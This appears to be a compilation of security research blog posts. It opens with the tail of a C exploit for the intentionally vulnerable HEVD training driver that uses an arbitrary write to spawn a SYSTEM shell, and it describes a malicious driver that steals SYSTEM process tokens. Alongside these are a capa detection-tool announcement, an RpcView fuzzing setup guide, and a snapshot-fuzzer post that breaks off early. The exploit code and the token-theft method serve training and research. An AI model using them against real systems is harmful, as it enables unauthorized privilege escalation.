    printf("[+] Successfully executed the shellcode!\n");

    // Leverage arbitrary write for restoration purposes

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of the preserved value at [nt!HalDispatchTable+0x8])
    mainObject.Name = &halDispatch;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully restored [nt!HalDispatchTable+0x8]!\n");

    // Print update for NT AUTHORITY\SYSTEM shell
    printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

    // Spawning an NT AUTHORITY\SYSTEM shell
    system("cmd.exe /c cmd.exe /K cd C:\\");
}

void main(void)
{
    // Open a handle to the driver
    printf("[+] Obtaining handle to HEVD.sys...\n");

    HANDLE drvHandle = CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        0x0,
        NULL,
        OPEN_EXISTING,
        0x0,
        NULL
    );

    // Error handling
    if (drvHandle == (HANDLE)-1)
    {
        printf("[-] Error! Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());
        exit(-1);
    }
    else
    {
        readwritePrimitive(drvHandle);
    }
}

capa 2.0: Better, Faster, Stronger

Threat Research

William Ballenthin

19 July 2021 at 18:00

We are excited to announce version 2.0 of our open-source tool called capa. capa automatically identifies capabilities in programs using an extensible rule set. The tool supports both malware triage and deep dive reverse engineering. If you haven’t heard of capa before, or need a refresher, check out our first blog post. You can download capa 2.0 standalone binaries from the project’s release page and checkout the source code on GitHub.

capa 2.0 enables anyone to contribute rules more easily, which makes the existing ecosystem even more vibrant. This blog post details the following major improvements included in capa 2.0:

New features and enhancements for the capa explorer IDA Pro plugin, allowing you to interactively explore capabilities and write new rules without switching windows
More concise and relevant results via identification of library functions using FLIRT and the release of accompanying open-source FLIRT signatures
Hundreds of new rules describing additional malware capabilities, bringing the collection up to 579 total rules, with more than half associated with ATT&CK techniques
Migration to Python 3, to make it easier to integrate capa with other projects

capa explorer and Rule Generator

capa explorer is an IDAPython plugin that shows capa results directly within IDA Pro. The version 2.0 release includes many additions and improvements to the plugin, but we'd like to highlight the most exciting addition: capa explorer now helps you write new capa rules directly in IDA Pro!

Since we spend most of our time in reverse engineering tools such as IDA Pro analyzing malware, we decided to add a capa rule generator. Figure 1 shows the rule generator interface.

Figure 1: capa explorer rule generator interface

Once you’ve installed capa explorer using the Getting Started guide, open the plugin by navigating to Edit > Plugins > FLARE capa explorer. You can start using the rule generator by selecting the Rule Generator tab at the top of the capa explorer pane. From here, navigate your IDA Pro Disassembly view to the function containing a technique you'd like to capture and click the Analyze button. The rule generator will parse, format, and display all the capa features that it finds in your function. You can write your rule using the rule generator's three main panes: Features, Preview, and Editor. Your first step is to add features from the Features pane.

The Features pane is a tree view containing all the capa features extracted from your function. You can filter for specific features using the search bar at the top of the pane. Then, you can add features by double-clicking them. Figure 2 shows this in action.

Figure 2: capa explorer feature selection

As you add features from the Features pane, the rule generator automatically formats and adds them to the Preview and Editor panes. The Preview and Editor panes help you finesse the features that you've added and allow you to modify other information like the rule's metadata.

The Editor pane is an interactive tree view that displays the statement and feature hierarchy that forms your rule. You can reorder nodes using drag-and-drop and edit nodes via right-click context menus. To help humans understand the rule logic, you can add descriptions and comments to features by typing in the Description and Comment columns. The rule generator automatically formats any changes that you make in the Editor pane and adds them to the Preview pane. Figure 3 shows how to manipulate a rule using the Editor pane.

Figure 3: capa explorer editor pane

The Preview pane is an editable textbox containing the final rule text. You can edit any of the text displayed. The rule generator automatically formats any changes that you make in the Preview pane and adds them to the Editor pane. Figure 4 shows how to edit a rule directly in the Preview pane.

Figure 4: capa explorer preview pane

As you make edits the rule generator lints your rule and notifies you of any errors using messages displayed underneath the Preview pane. Once you've finished writing your rule you can save it to your capa rules directory by clicking the Save button. The rule generator saves exactly what is displayed in the Preview pane. It’s that simple!

We’ve found that using the capa explorer rule generator significantly reduces the amount of time spent writing new capa rules. This tool not only automates most of the rule writing process but also eliminates the need to context switch between IDA Pro and your favorite text editor allowing you to codify your malware knowledge while it’s fresh in your mind.

To learn more about capa explorer and the rule generator check out the README.

Library Function Identification Using FLIRT

As we wrote hundreds of capa rules and inspected thousands of capa results, we recognized that the tool sometimes shows distracting results due to embedded library code. We believe that capa needs to focus its attention on the programmer’s logic and ignore supporting library code. For example, highly optimized C/C++ runtime routines and open-source library code enable a programmer to quickly build a product but are not the product itself. Therefore, capa results should reflect the programmer’s intent for the program rather than a categorization of every byte in the program.

Compare the capa v1.6 results in Figure 5 versus capa v2.0 results in Figure 6. capa v2.0 identifies and skips almost 200 library functions and produces more relevant results.

Figure 5: capa v1.6 results without library code recognition

Figure 6: capa v2.0 results ignoring library code functions

So, we searched for a way to differentiate a programmer’s code from library code.

After experimenting with a few strategies, we landed upon the Fast Library Identification and Recognition Technology (FLIRT) developed by Hex-Rays. Notably, this technique has remained stable and effective since 1996, is fast, requires very limited code analysis, and enjoys a wide community in the IDA Pro userbase. We figured out how IDA Pro matches FLIRT signatures and re-implemented a matching engine in Rust with Python bindings. Then, we built an open-source signature set that covers many of the library routines encountered in modern malware. Finally, we updated capa to use the new signatures to guide its analysis.

capa uses these signatures to differentiate library code from a programmer’s code. While capa can extract and match against the names of embedded library functions, it will skip finding capabilities and behaviors within the library code. This way, capa results better reflect the logic written by a programmer.

Furthermore, library function identification drastically improves capa runtime performance: since capa skips processing of library functions, it can avoid the costly rule matching steps across a substantial percentage of real-world functions. Across our testbed of 206 samples, 28% of the 186,000 total functions are recognized as library code by our function signatures. As our implementation can recognize around 100,000 functions/sec, library function identification overhead is negligible and capa is approximately 25% faster than in 2020!

Finally, we introduced a new feature class that rule authors can use to match recognized library functions: function-name. This feature matches at the file-level scope. We’ve already started using this new capability to recognize specific implementations of cryptography routines, such as AES provided by Crypto++, as shown in the example rule in Figure 7.

Figure 7: Example rule using function-name to recognize AES via Crypto++

As we developed rules for interesting behaviors, we learned a lot about where uncommon techniques are used legitimately. For example, as malware analysts, we most commonly see the cpuid instruction alongside anti-analysis checks, such as in VM detection routines. Therefore, we naively crafted rules to flag this instruction. But, when we tested it against our testbed, the rule matched most modern programs because this instruction is often legitimately used in high-optimized routines, such as memcpy, to opt-in to newer CPU features. In hindsight, this is obvious, but at the time it was a little surprising to see cpuid in around 15% of all executables. With the new FLIRT support, capa recognizes the optimized memcpy routine embedded by Visual Studio and won’t flag the embedded cpuid instruction, as it's not part of the programmer’s code.

When a user upgrades to capa 2.0, they’ll see that the tool runs faster and provides more precise results.

Signature Generation

To provide the benefits of python-flirt to all users (especially those without an IDA Pro license) we have spent significant time to create a comprehensive FLIRT signature set for the common malware analysis use-case. The signatures come included with capa and are also available at our GitHub under the Apache 2.0 license. We believe that other projects can benefit greatly from this. For example, we expect the performance of FLOSS to improve once we’ve incorporated library function identification. Moreover, you can use our signatures with IDA Pro to recognize more library code.

Our initial signatures include:

From Microsoft Visual Studio (VS), for all major versions from VS6 to VS2019:
- C and C++ run-time libraries
- Active Template Library (ATL) and Microsoft Foundation Class (MFC) libraries
The following open-source projects as compiled with VS2015, VS2017, and VS2019:
- CryptoPP
- curl
- Microsoft Detours
- Mbed TLS (previously PolarSSL)
- OpenSSL
- zlib

Identifying and collecting the relevant library and object files took a lot of work. For the older VS versions this was done manually. For newer VS versions and the respective open-source projects we were able to automate the process using vcpgk and Docker.

We then used the IDA Pro FLAIR utilities to convert gigabytes of executable code into pattern files and then into signatures. This process required extensive research and much trial and error. For instance, we spent two weeks testing and exploring the various FLAIR options to understand the best combination. We appreciate Hex-Rays for providing high-quality signatures for IDA Pro and thank them for sharing their research and tools with the community.

To learn more about the pattern and signature file generation check out the siglib repository. The FLAIR utilities are available in the protected download area on Hex-Rays’ website.

Rule Updates

Since the initial release, the community has more than doubled the total capa rule count from 260 to over 570 capability detection rules! This means that capa recognizes many more techniques seen in real-world malware, certainly saving analysts time as they reverse engineer programs. And to reiterate, we’ve surfed a wave of support as almost 30 colleagues from a dozen organizations have volunteered their experience to develop these rules. Thank you!

Figure 8 provides a high-level overview of capabilities capa currently captures, including:

Host Interaction describes program functionality to interact with the file system, processes, and the registry
Anti-Analysis describes packers, Anti-VM, Anti-Debugging, and other related techniques
Collection describes functionality used to steal data such as credentials or credit card information
Data Manipulation describes capabilities to encrypt, decrypt, and hash data
Communication describes data transfer techniques such as HTTP, DNS, and TCP

Figure 8: Overview of capa rule categories

More than half of capa’s rules are associated with a MITRE ATT&CK technique including all techniques introduced in ATT&CK version 9 that lie within capa’s scope. Moreover, almost half of the capa rules are currently associated with a Malware Behavior Catalog (MBC) identifier.

For more than 70% of capa rules we have collected associated real-world binaries. Each binary implements interesting capabilities and exhibits noteworthy features. You can view the entire sample collection at our capa test files GitHub page. We rely heavily on these samples for developing and testing code enhancements and rule updates.

Python 3 Support

Finally, we’ve spent nearly three months migrating capa from Python 2.7 to Python 3. This involved working closely with vivisect and we would like to thank the team for their support. After extensive testing and a couple of releases supporting two Python versions, we’re excited that capa 2.0 and future versions will be Python 3 only.

Conclusion

Now that you’ve seen all the recent improvements to capa, we hope you’ll upgrade to the newest capa version right away! Thanks to library function identification capa will report faster and more relevant results. Hundreds of new rules capture the most interesting malware functionality while the improved capa explorer plugin helps you to focus your analysis and codify your malware knowledge while it’s fresh.

Standalone binaries for Windows, Mac, and Linux are available on the capa Releases page. To install capa from PyPi use the command pip install flare-capa. The source code is available at our capa GitHub page. The project page on GitHub contains detailed documentation, including thorough installation instructions and a walkthrough of capa explorer. Please use GitHub to ask questions, discuss ideas, and submit issues.

We highly encourage you to contribute to capa’s rule corpus. The improved IDA Pro plugin makes it easier than ever before. If you have any issues or ideas related to rules, please let us know on the GitHub repository. Remember, when you share a rule with the community, you scale your impact across hundreds of reverse engineers in dozens of organizations.

Stealing Tokens In Kernel Mode With A Malicious Driver

SolomonSklash.io

Solomon Sklash

28 July 2021 at 15:20

Stealing Tokens In Kernel Mode With A Malicious Driver

Introduction

I’ve recently been working on expanding my knowledge of Windows kernel concepts and kernel mode programming. In the process, I wrote a malicious driver that could steal the token of one process and assign it to another. This article by the prolific and ever-informative spotless forms the basis of this post. In that article he walks through the structure of the _EPROCESS and _TOKEN kernel mode structures, and how to manipulate them to change the access token of a given process, all via WinDbg. It’s a great post and I highly recommend reading it before continuing on here.

The difference in this post is that I use C++ to write a Windows kernel mode driver from scratch and a user mode program that communicates with that driver. This program passes in two process IDs, one to steal the token from, and another to assign the stolen token to. All the code for this post is available here.

About Access Tokens

A common method of escalating privileges via buggy drivers or kernel mode exploits is to the steal the access token of a SYSTEM process and assign it to a process of your choosing. However this is commonly done with shellcode that is executed by the exploit. Some examples of this can be found in the wonderful HackSys Extreme Vulnerable Driver project. My goal was to learn more about drivers and kernel programming rather than just pure exploitation, so I chose to implement the same concept in C++ via a malicious driver.

Every process has a primary access token, which is a kernel data structure that describes the rights and privileges that a process has. Tokens have been covered in detail by Microsoft and from an offensive perspective, so I won’t spend a lot of time on them here. However it is important to know how the access token structure is associated with each process.

Processes And The `_EPROCESS` Structure

Each process is represented in the kernel by a doubly linked list of _EPROCESS structures. This structure is not fully documented by Microsoft, but the ReactOS project as usual has a good definition of it. One of the members of this structure is called, unsurprisingly, Token. Technically this member is of type _EX_FAST_REF, but for our purposes, this is just an implementation detail. This Token member contains a pointer to the address of the token object belonging to that particular process. An image of this member within the _EPROCESS structure in WinDbg can be seen below:

Token in WinDbg

As you can see, the Token member is located at a fixed offset from the beginning of the _EPROCESS structure. This seems to change between versions of Windows, and on my test machine running Windows 10 20H2, the offset is 0x4b8.

The Method

Given the above information, the method for stealing a token and assigning it is simple. Find the _EPROCESS structure of the process we want to steal from, go to the Token member offset, save the address that it is pointing to, and copy it to the corresponding Token member of the process we want to elevate privileges with. This is the same process that Spotless performed in WinDbg.

The Driver

In lieu of exploiting a kernel mode exploit, I write a simple test driver. The driver exposes an IOCTL that can be called from user mode. It takes struct that contains two members: an unsigned long for the PID of the process to steal a token from, and an unsigned long for the PID of the process to elevate.

PID Struct

The driver will find the _EPROCESS structure for each PID, find the Token members, and copies the target process token to the destination process.

The User Mode Program

The user mode program is a simple C++ CLI application that takes two PIDs as arguments, and copies the token of the first PID to the second PID, via the exposed driver IOCTL. This is done by first opening a handle to the driver by name with CreateFileW and then calling DeviceIoControl with the correct IOCTL.

User Mode Code

The Driver Code

The code for the token copying is pretty straight forward. In the main function for handling IOCTLs, HandleDeviceIoControl, we switch on the received IOCTL. When we receive IOCTL_STEAL_TOKEN, we save the user mode buffer, extract the two PIDs, and attempt to resolve the PID of the target process to the address of its _EPROCESS structure:

IOCTL Switch

Once we have the _EPROCESS address, we can use the offset of 0x4b8 to find the Token member address:

Token Offset

We repeat the process once more for the PID of the process to steal a token from, and now we have all the information we need. The last step is to copy the source token to the target process, like so:

Copy Token

The Whole Process

Here is a visual breakdown of the entire flow. First we create a command prompt and verify who we are:

Whoami

Next we use the user mode program to pass the two PIDs to the driver. The first PID, 4, is the PID of the System process, and is usually always 4. We see that the driver was accessed and the PIDs passed to it successfully:

User Mode Program

In the debug output view, we can see that HandleDeviceIoControl is called with the IOCTL_STEAL_TOKEN IOCTL, the PIDs are processed, and the target token overwritten. Highlighted are the identical addresses of the two tokens after the copy, indicating that we have successfully assigned the token:

Copy Token Debug View

Finally we run whoami again, and see that we are now SYSTEM!

Whoami System

We can even do the same thing with another user’s token:

Whoami 2

Conclusion

Kernel mode is fun! If you’re on the offensive side of the house, it’s well worth digging into. After all, every user mode road leads to kernel space; knowing your way around can only make you a better operator, and it expands the attack surface available to you. Blue can benefit just as much, since knowing what you’re defending at a deep level will make you able to defend it more effectively. To dig deeper I highly recommend Pavel Yosifovich’s Windows Kernel Programming, the HackSys Extreme Vulnerable Driver, and of course the Windows Internals books.

Fuzzing Windows RPC with RpcView

itm4n

1 August 2021 at 00:00

The recent release of PetitPotam by @topotam77 motivated me to get back to Windows RPC fuzzing. On this occasion, I thought it would be cool to write a blog post explaining how one can get into this security research area.

RPC as a Fuzzing Target?

As you know, RPC stands for “Remote Procedure Call”, and it isn’t a Windows specific concept. The first implementations of RPC were made on UNIX systems in the eighties. This allowed machines to communicate with each other on a network, and it was even “used as the basis for Network File System (NFS)” (source: Wikipedia).

The RPC implementation developed by Microsoft and used on Windows is DCE/RPC, which is short for “Distributed Computing Environment / Remote Procedure Calls” (source: Wikipedia). DCE/RPC is only one of the many IPC (Interprocess Communications) mechanisms used in Windows. For example, it’s used to allow a local process or even a remote client on the network to interact with another process or a service on a local or remote machine.

As you will have understood, the security implications of such a protocol are particularly interesting. Vulnerabilities in a an RPC server may have various consequences, ranging from Denial of Service (DoS) to Remote Code Execution (RCE) and including Local Privilege Escalation (LPE). Coupled with the fact that the code of the legacy RPC servers on Windows is often quite old (if we exclude the more recent (D)COM model), this makes it a very interesting target for fuzzing.

How to Fuzz Windows RPC?

To be clear, this post is not about advanced and automated fuzzing. Others, far more talented than me, already discussed this topic. Rather, I want to show how a beginner can get into this kind of research without any knowledge in this field.

Pentesters use Windows RPC every time they work in Windows / Active Directory environments with impacket-based tools, perhaps without always being fully aware of it. The use of Windows RPC was probably made a bit more obvious with tools such as SpoolSample (a.k.a the “Printer Bug”) by @tifkin_ or, more recently, PetitPotam by @topotam77.

If you want to know how these tools work, or if you want to find bugs in Windows RPC by yourself, I think there are two main approaches. The first approach consists in looking for interesting keywords in the documentation and then experimenting by modyfing the impacket library or by writing an RPC client in C. As explained by @topotam77 in the episode 0x09 of the French Hack’n Speak podcast, this approach was particularly efficient in the conception of PetitPotam. However, it has some limitations. The main one is that not all RPC interfaces are documented, and even the existing documentation isn’t always complete. Therefore, the second approach consists in enumerating the RPC servers directly on a Windows machine, with a tool such as RpcView.

RpcView

If you are new to Windows RPC analysis, RpcView is probably the best tool to get started. It is able to enumerate all the RPC servers that are running on a machine and it provides all the collected information in a very neat GUI (Graphical User Interface). When you are not yet familiar with a technical and/or abstract concept, being able to visualize things this way is an undeniable benefit.

Note: this screenshot was taken from https://rpcview.org/.

This tool was originally developed by 4 French researchers - Jean-Marie Borello, Julien Boutet, Jeremy Bouetard and Yoanne Girardin (see authors) - in 2017 and is still actively maintained. Its use was highlighted at PacSec 2017 in the presentation A view into ALPC-RPC by Clément Rouault and Thomas Imbert. This presentation also came along with the tool RPCForge.

Downloading and Running RpcView for the First Time

RpcView’s official repository is located here: https://github.com/silverf0x/RpcView. For each commit, a new release is automatically built through AppVeyor. So, you can always download the latest version of RpcView here.

After extracting the 7z archive, you just have to execute RpcView.exe (ideally as an administrator), and you should be ready to go. However, if the version of Windows you are using is too recent, you will probably get an error similar to the one below.

According to the error message, our “runtime version” is not supported, and we are supposed to send our rpcrt4.dll file to the dev team. This message may sound a bit cryptic for a neophyte but there is nothing to worry about, that’s completely fine.

The library rpcrt4.dll, as its name suggests, literally contains the “RPC runtime”. In other words, it contains all the necessary base code that allows an RPC client and an RPC server to communicate with each other.

Now, if we take a look at the README on GitHub, we can see that there is a section entitled How to add a new RPC runtime. It tells us that there are two ways to solve this problem. The first way is to just edit the file RpcInternals.h and add our runtime version. The second way is to reverse rpcrt4.dll in order to define the required structures such as RPC_SERVER. Honestly, the implementation of the RPC runtime doesn’t change that often, so the first option is perfectly fine in our case.

Compiling RpcView

We saw that our RPC runtime is not currently supported, so we will have to update RpcInternals.h with our runtime version and build RpcView from the source. To do so, we will need the following:

Visual Studio 2019 (Community)
CMake >= 3.13.2
Qt5 == 5.15.2

Note: I strongly recommend using a Virtual Machine for this kind of setup. For your information, I also use Chocolatey - the package manager for Windows - to automate the installation of some of the tools (e.g.: Visual Studio, GIT tools).

Installing Visual Studio 2019

You can download Visual Studio 2019 here or install it with Chocolatey.

choco install visualstudio2019community

While you’re at it, you should also install the Windows SDK as you will need it later on. I use the following code in PowerShell to find the latest available version of the SDK.

[string[]]$sdks = (choco search windbg | findstr "windows-sdk")
$sdk_latest = ($sdks | Sort-Object -Descending | Select -First 1).split(" ")[0]

And I install it with Chocolatey. If you want to install it manually, you can also download the web installer here.

choco install $sdk_latest

Once, Visual Studio is installed. You have to open the “Visual Studio Installer”.

And install the “Desktop development with C++” toolkit. I hope you have a solid Internet connection and enough disk space… :grimacing:

Installing CMake

Installing CMake is as simple as running the following command with Chocolatey. But, again, you can also download it from the official website and install it manually.

choco install cmake

Note: CMake is also part of Visual Studio “Desktop development with C++”, but I never tried to compile RpcView with this version.

Installing Qt

At the time of writing, the README specifies that the version of Qt used by the project is 5.15.2. I highly recommend using the exact same version, otherwise you will likely get into trouble during the compilation phase.

The question is how do you find and download Qt5 5.15.2? That’s were things get a bit tricky because the process is a bit convoluted. First, you need to register an account here. This will allow you to use their custom web installer. Then, you need to download the installer here.

Once you have started the installer, it will prompt you to log in with your Qt account.

After that, you can leave everything as default. However, at the “Select Components” step, make sure to select Qt 5.15.2 for MSVC 2019 32 & 64 bits only. That’s already 2.37 GB of data to download, but if you select everything, that represents around 60 GB. :open_mouth:

If you are lucky enough, the installer should run flawlessly, but if you are not, you will probably encounter an error similar to the one below. At the time of writing, an issue is currently open on their bug tracker here, but they don’t seem to be in a hurry to fix it.

To solve this problem, I wrote a quick and dirty PowerShell script that downloads all the required files directly from the closest Qt mirror. That’s probably against the terms of use, but hey, what can you do?! I just wanted to get the job done.

If you let all the values as default, the script will download and extract all the required files for Visual Studio 2019 (32 & 64 bits) in C:\Qt\5.15.2\.

Note: make sure 7-Zip is installed before running this script!

# Update these settings according to your needs but the default values should be just fine.
$DestinationFolder = "C:\Qt"
$QtVersion = "qt5_5152"
$Target = "msvc2019"
$BaseUrl = "https://download.qt.io/online/qtsdkrepository/windows_x86/desktop"
$7zipPath = "C:\Program Files\7-Zip\7z.exe"

# Store all the 7z archives in a Temp folder.
$TempFolder = Join-Path -Path $DestinationFolder -ChildPath "Temp"
$null = [System.IO.Directory]::CreateDirectory($TempFolder)

# Build the URLs for all the required components.
$AllUrls = @("$($BaseUrl)/tools_qtcreator", "$($BaseUrl)/$($QtVersion)_src_doc_examples", "$($BaseUrl)/$($QtVersion)")

# For each URL, retrieve and parse the "Updates.xml" file. This file contains all the information
# we need to dowload all the required files.
foreach ($Url in $AllUrls) {
    $UpdateXmlUrl = "$($Url)/Updates.xml"
    $UpdateXml = [xml](New-Object Net.WebClient).DownloadString($UpdateXmlUrl)
    foreach ($PackageUpdate in $UpdateXml.GetElementsByTagName("PackageUpdate")) {
        $DownloadableArchives = @()
        if ($PackageUpdate.Name -like "*$($Target)*") {
            $DownloadableArchives += $PackageUpdate.DownloadableArchives.Split(",") | ForEach-Object { $_.Trim() } | Where-Object { -not [string]::IsNullOrEmpty($_) }
        }
        $DownloadableArchives | Sort-Object -Unique | ForEach-Object {
            $Filename = "$($PackageUpdate.Version)$($_)"
            $TempFile = Join-Path -Path $TempFolder -ChildPath $Filename
            $DownloadUrl = "$($Url)/$($PackageUpdate.Name)/$($Filename)"
            if (Test-Path -Path $TempFile) {
                Write-Host "File $($Filename) found in Temp folder!"
            }
            else {
                Write-Host "Downloading $($Filename) ..."
                (New-Object Net.WebClient).DownloadFile($DownloadUrl, $TempFile)
            }
            Write-Host "Extracting file $($Filename) ..."
            &"$($7zipPath)" x -o"$($DestinationFolder)" $TempFile | Out-Null
        }
    }
}

Building RpcView

We should be ready to go. One last piece is missing though: the RPC runtime version. When I first tried to build RpcView from the source files, I was a bit confused and I didn’t really know which version number was expected, but it’s actually very simple (once you know what to look for…).

You just have to open the properties of the file C:\Windows\System32\rpcrt4.dll and get the File Version. In my case, it’s 10.0.19041.1081.

Then, you can download the source code.

git clone https://github.com/silverf0x/RpcView

After that, we have to edit both .\RpcView\RpcCore\RpcCore4_64bits\RpcInternals.h and .\RpcView\RpcCore\RpcCore4_32bits\RpcInternals.h. At the beginning of this file, there is a static array that contains all the supported runtime versions.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL,  //6.3.9431.0000
    0x6000325804000LL,  //6.3.9600.16384
    ...
    0xA00004A6102EALL,  //10.0.19041.746
    0xA00004A61041CLL,  //10.0.19041.1052
}

We can see that each version number is represented as a longlong value. For example, the version 10.0.19041.1052 translates to:

0xA00004A61041 = 0x000A (10) || 0x0000 (0) || 0x4A61 (19041) || 0x041C (1052)

If we apply the same conversion to the version number 10.0.19041.1081, we get the following result.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL,  //6.3.9431.0000
    0x6000325804000LL,  //6.3.9600.16384
    ...
    0xA00004A6102EALL,  //10.0.19041.746
    0xA00004A61041CLL,  //10.0.19041.1052
    0xA00004A610439LL,  //10.0.19041.1081
}

Finally, we can generate the Visual Studio solution and build it. I will show only the 64-bits compilation process, but if you want to compile the 32-bits version, you can refer to the documentation. The process is very similar anyway.

For the next commands, I assume the following:

Qt is installed in C:\Qt\5.15.2\.
CMake is installed in C:\Program Files\CMake\.
The current working directory is RpcView’s source folder (e.g.: C:\Users\lab-user\Downloads\RpcView\).

mkdir Build\x64
cd Build\x64
set CMAKE_PREFIX_PATH=C:\Qt\5.15.2\msvc2019_64\
"C:\Program Files\CMake\bin\cmake.exe" ../../ -A x64
"C:\Program Files\CMake\bin\cmake.exe" --build . --config Release

Finally, you can download the latest release from AppVeyor here, extract the files, and replace RpcCore4_64bits.dll and RpcCore4_32bits.dll with the versions that were compiled and copied to .\RpcView\Build\x64\bin\Release\.

If all went well, RpcView should finally be up and running! :tada:

Patching RpcView

If you followed along, you probably noticed that, in the end, we did all that just to add a numeric value to two DLLs. Of course, there is a more straightforward way to get the same result. We can just patch the existing DLLs and replace one of the existing values with our own runtime version.

To do so, I will open the two DLLs with HxD. We know that the value 0xA00004A61041C is present in both files, so we can try to locate it within the binary data. Values are stored using the little-endian byte ordering though, so we actually have to search for the hexadecimal pattern 1C04614A00000A00.

Here, we just have to replace the value 1C04 (0x041C = 1052) with 3904 (0x0439 = 1081) because the rest of the version number is the same (10.0.19041).

After saving the two files, RpcView should be up and running. That’s a dirty hack, but it works and it’s way more effective than building the project from the source! :roll_eyes:

Update: Using the “Force” Flag

As it turns out, you don’t even need to go through all this trouble. RpcView has an undocumented /force command line flag that you can use to override the RPC runtime version check.

.\RpcView64\RpcView.exe /force

Honestly, I did not look at the code at all. Otherwise I would have probably seen this. Lesson learned. Thanks @Cr0Eax for bringing this to my attention (source: Twitter). Anyway, building it and patching it was a nice challenge I guess. :sweat_smile:

Initial Configuration

Now that RpcView is up and running, we need to tweak it a little bit in order to make it really usable.

The Refresh Rate

The first thing you want to do is lower the refresh rate, especially if you are running it inside a Virtual Machine. Setting it to 10 seconds is perfectly fine. You could even set this parameter to “manual”.

Symbols

On the screenshot below, we can see that there is section which is supposed to list all the procedures or functions that are exposed through an RPC server, but it actually only contains addresses.

This isn’t very convenient, but there is a cool thing about most Windows binaries. Microsoft publishes their associated PDB (Program DataBase) file.

PDB is a proprietary file format (developed by Microsoft) for storing debugging information about a program (or, commonly, program modules such as a DLL or EXE) - source: Wikipedia

These symbols can be configured through the Options > Configure Symbols menu item. Here, I set it to srv*C:\SYMBOLS.

The only caveat is that RpcView is not able, unlike other tools, to download the PDB files automatically. So, we need to download them beforehand.

If you have downloaded the Windows 10 SDK, this step should be quite easy though. The SDK includes a tool called symchk.exe which allows you to fetch the PDB files for almost any EXE or DLL, directly from Microsoft’s servers. For example, the following command allows you to download the symbols for all the DLLs in C:\Windows\System32\.

cd "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\"
symchk /s srv*c:\SYMBOLS*https://msdl.microsoft.com/download/symbols C:\Windows\System32\*.dll

Once the symbols have been downloaded, RpcView must be restarted. After that, you should see that the name of each function is resolved in the “Procedures” section. :ok_hand:

Conclusion

This post is already longer than I initially anticipated, so I will end it there. If you are new to this, I think you already have all the basics to get started. The main benefit of a GUI-based tool such as RpcView is that you can very easily explore and visualize some internals and concepts that might be difficult to grasp otherwise.

If you liked this post, don’t hesitate to let me know on Twitter. I only scratched the surface here, but this could be the beginning of a series in which I explore Windows RPC. In the next part, I could explain how to interact with an RPC server. In particular, I think it would be a good idea to use PetitPotam as an example, and show how you can reproduce it, based on the information you can get from RpcView.

Links & Resources

RpcView
https://rpcview.org/
GitHub - PetitPotam by @topotam77
https://github.com/topotam/PetitPotam
PacSec 2017 - A view into ALPC-RPC
https://hakril.net/slides/A_view_into_ALPC_RPC_pacsec_2017.pdf

Building a new snapshot fuzzer & fuzzing IDA

Diary of a reverse-engineer

Axel "0vercl0k" Souchet

15 July 2021 at 15:00

Introduction

It is January 2020 and it is this time of the year where I try to set goals for myself. I had just come back from spending Christmas with my family in France and felt fairly recharged. It always is an exciting time for me to think and plan for the year ahead; who knows maybe it'll be the year where I get good at computers I thought (spoiler alert: it wasn't).

One thing I had in the back of my mind was to develop my own custom fuzzing tooling. It was the perfect occasion to play with technologies like Windows Hypervisor platform APIs, KVM APIs but also try out what recent versions of C++ had in store. After talking with yrp604, he convinced me to write a tool that could be used to fuzz any Windows targets, user or kernel, application or service, kernel or drivers. He had done some work in this area so he could follow me along and help me out when I ran into problems.

Great, the plan was to develop this Windows snapshot-based fuzzer running the target code into some kind of environment like a VM or an emulator. It would allow the user to instrument the target the way they wanted via breakpoints and would provide basic features that you expect from a modern fuzzer: code coverage, crash detection, general mutator, cross-platform support, fast restore, etc.

Writing a tool is cool but writing a useful tool is even cooler. That's why I needed to come up with a target I could try the fuzzer against while developing it. I thought that IDA would make a good target for several reasons:

It is a complex Windows user-mode application,
It parses a bunch of binary files,
The application is heavy and is slow to start. The snapshot approach could help fuzz it faster than traditionally,
It has a bug bounty.

In this blog post, I will walk you through the birth of what the fuzz, its history, and my overall journey from zero to accomplishing my initial goals. For those that want the results before reading, you can find my findings in this Github repository: fuzzing-ida75.

There is also an excellent blog post that my good friend Markus authored on RET2 Systems' blog documenting how he used wtf to find exploitable memory corruption in a triple-A game: Fuzzing Modern UDP Game Protocols With Snapshot-based Fuzzers.

Table of contents:

Architecture

At this point I had a pretty good idea of what the final product should look like and how a user would use wtf:

The user finds a spot in the target that is close to consuming attacker-controlled data. The Windows kernel debugger is used to break at this location and put the target into the wanted state. When done, the user generates a kernel-crash dump and extracts the CPU state.
The user writes a module to tell wtf how to insert a test case in the target. wtf provides basic features like reading physical and virtual memory ranges, read and write registers, etc. The user also defines exit conditions to tell the fuzzer when to stop executing test cases.
wtf runs the targeted code, tracks code coverage, detects crashes, and tracks dirty memory.
wtf restores the dirty physical memory from the kernel crash dump and resets the CPU state. It generates a new test case, rinse & repeat.

After laying out the plan, I realized that I didn't have code that parsed Windows kernel-crash dump which is essential for wtf. So I wrote kdmp-parser which is a C++ library that parses Windows kernel crash dumps. I wrote it myself because I couldn't find a simple drop-in library available on the shelf. Getting physical memory is not enough because I also needed to dump the CPU state as well as MSRs, etc. Thankfully yrp604 had already hacked up a Windbg Javascript extension to do the work and so I reused it bdump.js.

Once I was able to extract the physical memory & the CPU state I needed an execution environment to run my target. Again, yrp604 was working on bochscpu at the time and so I started there. bochscpu is basically bochs's CPU available from a Rust library with C bindings (yes he kindly made bindings because I didn't want to touch any Rust). It basically is a software CPU that knows how to run intel 64-bit code, knows about segmentation, rings, MSRs, etc. It also doesn't use any of bochs devices so it is much lighter. From the start, I decided that wtf wouldn't handle any devices: no disk, no screen, no mouse, no keyboards, etc.

Bochscpu 101

